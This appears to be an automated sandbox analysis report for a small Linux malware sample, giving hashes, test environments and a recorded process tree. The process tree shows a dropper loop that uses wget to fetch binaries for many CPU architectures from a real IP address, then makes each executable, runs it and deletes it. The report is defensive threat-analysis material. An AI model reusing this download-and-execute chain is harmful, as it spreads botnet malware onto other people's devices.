Analysis
-
max time kernel
36s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240418-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240418-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
05/05/2024, 02:27
Static task
static1
Behavioral task
behavioral1
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
ubuntu1804-amd64-20240418-en
Behavioral task
behavioral2
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
15917961bac6063481040fcc4af85061_JaffaCakes118
-
Size
1KB
-
MD5
15917961bac6063481040fcc4af85061
-
SHA1
cbd80d0978a0aaff4116d680da328cf5fd1153e9
-
SHA256
f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
-
SHA512
a284a0a6483d65b46cef2fd129fc68b40feb2a1bef82cb89ea12027462c23a0dc3ee87e48f09aa7302dc96bcbdf1b4f8bacab82ba7d0507f86e660f03d1b4935
Malware Config
Signatures
Processes
-
/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118 | /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118 | 1⤵ | PID:1533
-
/usr/bin/wget | wget http://45.95.168.138/mips | 2⤵ | PID:1534
-
-
/bin/chmod | chmod +x mips | 2⤵ | PID:1538
-
-
/tmp/mips | ./mips | 2⤵ | PID:1539
-
-
/bin/rm | rm -rf mips | 2⤵ | PID:1540
-
-
/usr/bin/wget | wget http://45.95.168.138/mipsel | 2⤵ | PID:1541
-
-
/bin/chmod | chmod +x mipsel | 2⤵ | PID:1542
-
-
/tmp/mipsel | ./mipsel | 2⤵ | PID:1543
-
-
/bin/rm | rm -rf mipsel | 2⤵ | PID:1544
-
-
/usr/bin/wget | wget http://45.95.168.138/sh4 | 2⤵ | PID:1545
-
-
/bin/chmod | chmod +x sh4 | 2⤵ | PID:1546
-
-
/tmp/sh4 | ./sh4 | 2⤵ | PID:1547
-
-
/bin/rm | rm -rf sh4 | 2⤵ | PID:1548
-
-
/usr/bin/wget | wget http://45.95.168.138/x86 | 2⤵ | PID:1549
-
-
/bin/chmod | chmod +x x86 | 2⤵ | PID:1550
-
-
/tmp/x86 | ./x86 | 2⤵ | PID:1551
-
-
/bin/rm | rm -rf x86 | 2⤵ | PID:1552
-
-
/usr/bin/wget | wget http://45.95.168.138/armv6l | 2⤵ | PID:1553
-
-
/bin/chmod | chmod +x armv6l | 2⤵ | PID:1554
-
-
/tmp/armv6l | ./armv6l | 2⤵ | PID:1555
-
-
/bin/rm | rm -rf armv6l | 2⤵ | PID:1556
-
-
/usr/bin/wget | wget http://45.95.168.138/i686 | 2⤵ | PID:1557
-
-
/bin/chmod | chmod +x i686 | 2⤵ | PID:1558
-
-
/tmp/i686 | ./i686 | 2⤵ | PID:1559
-
-
/bin/rm | rm -rf i686 | 2⤵ | PID:1560
-
-
/usr/bin/wget | wget http://45.95.168.138/powerpc | 2⤵ | PID:1561
-
-
/bin/chmod | chmod +x powerpc | 2⤵ | PID:1562
-
-
/tmp/powerpc | ./powerpc | 2⤵ | PID:1563
-
-
/bin/rm | rm -rf powerpc | 2⤵ | PID:1564
-
-
/usr/bin/wget | wget http://45.95.168.138/i586 | 2⤵ | PID:1565
-
-
/bin/chmod | chmod +x i586 | 2⤵ | PID:1566
-
-
/tmp/i586 | ./i586 | 2⤵ | PID:1567
-
-
/bin/rm | rm -rf i586 | 2⤵ | PID:1568
-
-
/usr/bin/wget | wget http://45.95.168.138/m68k | 2⤵ | PID:1569
-
-
/bin/chmod | chmod +x m68k | 2⤵ | PID:1570
-
-
/tmp/m68k | ./m68k | 2⤵ | PID:1571
-
-
/bin/rm | rm -rf m68k | 2⤵ | PID:1572
-
-
/usr/bin/wget | wget http://45.95.168.138/sparc | 2⤵ | PID:1573
-
-
/bin/chmod | chmod +x sparc | 2⤵ | PID:1576
-
-
/tmp/sparc | ./sparc | 2⤵ | PID:1577
-
-
/bin/rm | rm -rf sparc | 2⤵ | PID:1578
-
-
/usr/bin/wget | wget http://45.95.168.138/armv4l | 2⤵ | PID:1579
-
-
/bin/chmod | chmod +x armv4l | 2⤵ | PID:1580
-
-
/tmp/armv4l | ./armv4l | 2⤵ | PID:1581
-
-
/bin/rm | rm -rf armv4l | 2⤵ | PID:1582
-
-
/usr/bin/wget | wget http://45.95.168.138/armv5l | 2⤵ | PID:1583
-
-
/bin/chmod | chmod +x armv5l | 2⤵ | PID:1584
-
-
/tmp/armv5l | ./armv5l | 2⤵ | PID:1585
-
-
/bin/rm | rm -rf armv5l | 2⤵ | PID:1586
-